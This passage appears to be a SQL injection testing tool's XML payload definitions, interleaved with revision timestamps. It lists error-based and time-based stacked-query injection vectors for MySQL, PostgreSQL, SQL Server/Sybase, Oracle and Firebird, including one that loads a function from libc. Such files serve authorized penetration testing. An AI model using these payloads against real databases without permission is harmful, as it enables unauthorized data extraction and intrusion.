<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 4.1</dbms_version>
</details>
</test>
<test >
<title > MySQL OR error-based - WHERE or HAVING clause</title>
<stype > 2</stype>
<level > 3</level>
2011-07-10 12:54:22 +04:00
<risk > 2</risk>
2011-05-23 10:24:45 +04:00
<clause > 1</clause>
<where > 2</where>
2010-12-11 11:24:29 +03:00
<vector > OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
2010-12-09 18:09:03 +03:00
<request >
<payload > OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
2011-11-24 02:57:02 +04:00
<comment > #</comment>
2010-12-09 18:09:03 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2010-12-03 13:52:24 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > PostgreSQL OR error-based - WHERE or HAVING clause</title>
2010-12-03 13:52:24 +03:00
<stype > 2</stype>
<level > 2</level>
<risk > 2</risk>
<clause > 1</clause>
2010-12-05 15:23:18 +03:00
<where > 2</where>
2010-12-11 11:24:29 +03:00
<vector > OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
2010-12-03 13:52:24 +03:00
<request >
<payload > OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
2011-01-20 21:35:21 +03:00
<title > Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause</title>
2010-12-03 13:52:24 +03:00
<stype > 2</stype>
<level > 2</level>
<risk > 2</risk>
<clause > 1</clause>
2010-12-05 15:23:18 +03:00
<where > 2</where>
2010-12-11 11:24:29 +03:00
<vector > OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
2010-12-03 13:52:24 +03:00
<request >
<payload > OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2010-12-17 22:00:20 +03:00
</details>
</test>
<test >
2011-01-20 21:35:21 +03:00
<title > Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>
2010-12-17 22:00:20 +03:00
<stype > 2</stype>
<level > 3</level>
<risk > 2</risk>
<clause > 1</clause>
<where > 2</where>
<vector > OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request >
<payload > OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2010-12-03 13:52:24 +03:00
</details>
</test>
<test >
2011-01-20 21:35:21 +03:00
<title > Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>
2010-12-03 13:52:24 +03:00
<stype > 2</stype>
<level > 2</level>
<risk > 2</risk>
<clause > 1</clause>
2010-12-05 15:23:18 +03:00
<where > 2</where>
2011-07-23 10:07:00 +04:00
<vector > OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
2010-12-03 13:52:24 +03:00
<request >
2011-07-23 10:07:00 +04:00
<payload > OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
2010-12-03 13:52:24 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
2010-12-06 23:43:23 +03:00
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
2011-01-20 21:35:21 +03:00
<title > Oracle OR error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)</title>
2010-12-06 23:43:23 +03:00
<stype > 2</stype>
<level > 3</level>
<risk > 2</risk>
<clause > 1</clause>
<where > 2</where>
2010-12-11 11:24:29 +03:00
<vector > OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2010-12-06 23:43:23 +03:00
<request >
2010-12-07 01:52:18 +03:00
<payload > OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>
2010-12-06 23:43:23 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
2010-12-03 13:52:24 +03:00
<details >
<dbms > Oracle</dbms>
2010-12-07 00:39:57 +03:00
<dbms_version > > = 8.1.6</dbms_version>
2010-12-03 13:52:24 +03:00
</details>
</test>
2010-12-07 00:20:26 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > Oracle OR error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)</title>
2010-12-07 00:20:26 +03:00
<stype > 2</stype>
2010-12-07 15:45:45 +03:00
<level > 4</level>
<risk > 2</risk>
2010-12-07 00:20:26 +03:00
<clause > 1</clause>
2010-12-07 15:45:45 +03:00
<where > 2</where>
2011-03-08 17:29:22 +03:00
<vector > OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2010-12-07 00:20:26 +03:00
<request >
2010-12-07 01:52:18 +03:00
<payload > OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>
2010-12-07 00:20:26 +03:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2010-12-03 13:52:24 +03:00
<test >
2011-01-20 21:35:21 +03:00
<title > Firebird OR error-based - WHERE or HAVING clause</title>
2010-12-03 13:52:24 +03:00
<stype > 2</stype>
2010-12-04 19:40:08 +03:00
<level > 3</level>
2010-12-03 13:52:24 +03:00
<risk > 2</risk>
<clause > 1</clause>
2010-12-05 15:23:18 +03:00
<where > 2</where>
2010-12-11 11:24:29 +03:00
<vector > OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
2010-12-03 13:52:24 +03:00
<request >
<payload > OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Firebird</dbms>
</details>
</test>
2010-11-28 21:10:54 +03:00
<!--
TODO: if possible, add payload for SQLite, Microsoft Access,
2010-12-02 18:09:21 +03:00
and SAP MaxDB - no known techniques at this time
2010-11-28 21:10:54 +03:00
-->
2011-01-20 21:35:21 +03:00
<!-- End of error - based tests - WHERE or HAVING clause -->
2010-11-28 21:10:54 +03:00
2010-12-04 19:40:08 +03:00
<!-- Error - based tests - Parameter replace -->
2010-11-28 21:10:54 +03:00
<test >
2010-12-04 19:40:08 +03:00
<title > MySQL > = 5.0 error-based - Parameter replace</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
<level > 3</level>
<risk > 0</risk>
2010-12-05 15:23:18 +03:00
<clause > 1,2,3</clause>
2010-12-04 19:40:08 +03:00
<where > 3</where>
2011-11-22 19:28:31 +04:00
<vector > (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-11-22 19:28:31 +04:00
<payload > (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
2011-07-10 12:54:22 +04:00
<test >
2011-07-25 01:08:32 +04:00
<title > MySQL > = 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
2011-07-10 12:54:22 +04:00
<stype > 2</stype>
<level > 3</level>
<risk > 0</risk>
<clause > 1,2,3</clause>
<where > 3</where>
2011-07-25 02:26:11 +04:00
<vector > (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
2011-07-10 12:54:22 +04:00
<request >
2011-07-25 02:26:11 +04:00
<payload > (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
2011-07-10 12:54:22 +04:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
2011-07-25 01:08:32 +04:00
<test >
<title > MySQL > = 5.1 error-based - Parameter replace (UPDATEXML)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 0</risk>
<clause > 1,2,3</clause>
<where > 3</where>
<vector > (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
<request >
<payload > (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
2010-11-28 21:10:54 +03:00
<test >
2010-12-04 19:40:08 +03:00
<title > PostgreSQL error-based - Parameter replace</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
<level > 3</level>
<risk > 0</risk>
2010-12-05 15:23:18 +03:00
<clause > 1,2,3</clause>
2010-12-04 19:40:08 +03:00
<where > 3</where>
2010-12-11 11:24:29 +03:00
<vector > (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
2010-11-28 21:10:54 +03:00
<request >
2010-12-04 19:40:08 +03:00
<payload > (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
2010-12-04 19:40:08 +03:00
<title > Microsoft SQL Server/Sybase error-based - Parameter replace</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
<level > 3</level>
<risk > 0</risk>
2010-12-05 15:23:18 +03:00
<clause > 1,3</clause>
2010-12-04 19:40:08 +03:00
<where > 3</where>
2010-12-11 11:24:29 +03:00
<vector > (CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
2010-11-28 21:10:54 +03:00
<request >
2010-12-04 19:40:08 +03:00
<payload > (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2010-11-28 21:10:54 +03:00
</details>
</test>
<test >
2012-04-13 12:16:33 +04:00
<title > Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>
<stype > 2</stype>
<level > 4</level>
<risk > 0</risk>
<clause > 1,3</clause>
<where > 3</where>
<vector > (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
<request >
<payload > (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
2010-12-04 19:40:08 +03:00
<title > Oracle error-based - Parameter replace</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
<level > 3</level>
<risk > 0</risk>
2010-12-05 15:23:18 +03:00
<clause > 1,3</clause>
2010-12-04 19:40:08 +03:00
<where > 3</where>
2011-07-23 10:07:00 +04:00
<vector > (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-07-23 10:07:00 +04:00
<payload > (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
2010-12-05 15:23:18 +03:00
<title > Firebird error-based - Parameter replace</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
<level > 4</level>
<risk > 0</risk>
2010-12-05 15:23:18 +03:00
<clause > 1,3</clause>
2010-11-28 21:10:54 +03:00
<where > 3</where>
2010-12-11 11:24:29 +03:00
<vector > (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
2010-11-28 21:10:54 +03:00
<request >
2010-12-04 19:40:08 +03:00
<payload > (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > Firebird</dbms>
</details>
</test>
<!-- End of error - based tests - Parameter replace -->
<!-- Error - based tests - GROUP BY and ORDER BY clauses -->
<test >
<title > MySQL > = 5.0 error-based - GROUP BY and ORDER BY clauses</title>
<stype > 2</stype>
<level > 3</level>
<risk > 0</risk>
<clause > 2,3</clause>
<where > 1</where>
2011-11-22 19:28:31 +04:00
<vector > ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
2010-12-04 19:40:08 +03:00
<request >
2011-11-22 19:28:31 +04:00
<payload > ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0</dbms_version>
</details>
</test>
2011-07-10 12:54:22 +04:00
<test >
2011-07-25 01:08:32 +04:00
<title > MySQL > = 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)</title>
2011-07-10 12:54:22 +04:00
<stype > 2</stype>
<level > 3</level>
<risk > 0</risk>
<clause > 2,3</clause>
<where > 1</where>
2011-07-25 02:26:11 +04:00
<vector > ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
2011-07-10 12:54:22 +04:00
<request >
2011-07-25 02:26:11 +04:00
<payload > ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
2011-07-10 12:54:22 +04:00
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
2011-07-25 01:08:32 +04:00
<test >
2011-07-25 02:26:11 +04:00
<title > MySQL > = 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)</title>
2011-07-25 01:08:32 +04:00
<stype > 2</stype>
<level > 4</level>
<risk > 0</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
<request >
<payload > ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
</request>
<response >
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.1</dbms_version>
</details>
</test>
2010-11-28 21:10:54 +03:00
<test >
2010-12-04 19:40:08 +03:00
<title > PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
2010-12-04 19:40:08 +03:00
<level > 3</level>
2010-11-28 21:10:54 +03:00
<risk > 0</risk>
<clause > 2,3</clause>
2010-12-04 19:40:08 +03:00
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
2010-12-04 19:40:08 +03:00
<title > Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
2010-12-04 19:40:08 +03:00
<level > 3</level>
2010-11-28 21:10:54 +03:00
<risk > 0</risk>
<clause > 3</clause>
2010-12-04 19:40:08 +03:00
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ,(CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ,(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2010-11-28 21:10:54 +03:00
</details>
</test>
<test >
2010-12-07 20:17:01 +03:00
<title > Oracle error-based - GROUP BY and ORDER BY clauses</title>
2010-11-28 21:10:54 +03:00
<stype > 2</stype>
2010-12-04 19:40:08 +03:00
<level > 3</level>
2010-11-28 21:10:54 +03:00
<risk > 0</risk>
2010-12-07 20:17:01 +03:00
<clause > 2,3</clause>
2010-12-04 19:40:08 +03:00
<where > 1</where>
2011-07-23 10:07:00 +04:00
<vector > ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-07-23 10:07:00 +04:00
<payload > ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-01 13:31:50 +03:00
<grep > [DELIMITER_START](?P< result> .*?)[DELIMITER_STOP]</grep>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<!--
2010-12-03 13:52:24 +03:00
TODO: if possible, add payload for SQLite, Microsoft Access
and SAP MaxDB - no known techniques at this time
2010-11-28 21:10:54 +03:00
-->
<!-- End of error - based tests - GROUP BY and ORDER BY clauses -->
<!-- Stacked queries tests -->
<test >
<title > MySQL > 5.0.11 stacked queries</title>
<stype > 4</stype>
2011-04-11 03:20:35 +04:00
<level > 1</level>
2010-11-28 21:10:54 +03:00
<risk > 0</risk>
<clause > 0</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);</vector>
2010-11-28 21:10:54 +03:00
<request >
<payload > ; SELECT SLEEP([SLEEPTIME]);</payload>
2012-03-15 12:55:42 +04:00
<comment > -- </comment>
2010-11-28 21:10:54 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > 5.0.11</dbms_version>
</details>
</test>
<test >
2010-12-07 15:45:45 +03:00
<title > MySQL < 5.0.12 stacked queries (heavy query)</title>
2010-11-28 21:10:54 +03:00
<stype > 4</stype>
2011-04-11 03:20:35 +04:00
<level > 2</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2010-11-28 21:10:54 +03:00
<clause > 0</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]);</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'));</payload>
2012-03-15 12:55:42 +04:00
<comment > -- </comment>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > PostgreSQL > 8.1 stacked queries</title>
<stype > 4</stype>
<level > 1</level>
<risk > 0</risk>
<clause > 0</clause>
<where > 1</where>
2010-12-09 02:52:31 +03:00
<vector > ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
2010-11-28 21:10:54 +03:00
<request >
<payload > ; SELECT PG_SLEEP([SLEEPTIME]);</payload>
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
<test >
2010-12-09 02:52:31 +03:00
<title > PostgreSQL stacked queries (heavy query)</title>
2010-11-28 21:10:54 +03:00
<stype > 4</stype>
2010-12-09 02:52:31 +03:00
<level > 2</level>
2011-01-19 01:55:20 +03:00
<risk > 2</risk>
2010-11-28 21:10:54 +03:00
<clause > 0</clause>
<where > 1</where>
2011-03-08 17:29:22 +03:00
<vector > ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END);</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000);</payload>
2010-11-28 21:10:54 +03:00
<comment > --</comment>
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
2010-12-07 03:58:54 +03:00
<title > PostgreSQL < 8.2 stacked queries (Glibc)</title>
2010-11-28 21:10:54 +03:00
<stype > 4</stype>
<level > 4</level>
<risk > 0</risk>
<clause > 0</clause>
<where > 1</where>
2010-12-09 02:52:31 +03:00
<vector > ; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > ; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);</payload>
2010-11-28 21:10:54 +03:00
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > < 8.2</dbms_version>
<os > Linux</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase stacked queries</title>
<stype > 4</stype>
<level > 1</level>
<risk > 0</risk>
<clause > 0</clause>
<where > 1</where>
2010-12-09 02:55:42 +03:00
<vector > ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';</vector>
2010-11-28 21:10:54 +03:00
<request >
<payload > ; WAITFOR DELAY '0:0:[SLEEPTIME]';</payload>
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2010-11-28 21:10:54 +03:00
</details>
</test>
<test >
2010-12-09 18:24:48 +03:00
<title > Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
2010-11-28 21:10:54 +03:00
<stype > 4</stype>
2010-12-09 18:14:18 +03:00
<level > 5</level>
2010-11-28 21:10:54 +03:00
<risk > 0</risk>
<clause > 0</clause>
<where > 1</where>
2010-12-09 18:24:48 +03:00
<vector > ; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL;</vector>
2010-11-28 21:10:54 +03:00
<request >
